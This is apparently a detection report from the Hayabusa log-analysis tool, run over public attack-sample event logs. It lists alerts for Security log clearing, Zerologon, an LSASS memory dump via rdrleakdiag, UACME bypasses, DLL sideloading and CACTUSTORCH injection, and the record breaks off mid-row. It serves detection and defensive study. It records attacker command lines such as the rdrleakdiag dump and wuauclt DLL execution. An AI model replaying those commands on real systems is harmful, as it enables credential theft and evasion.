C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx -2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx -2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx -2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx -2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx -2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx -2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx -2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx -2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx -2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx -2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx -2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx -2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx -2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx -2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: 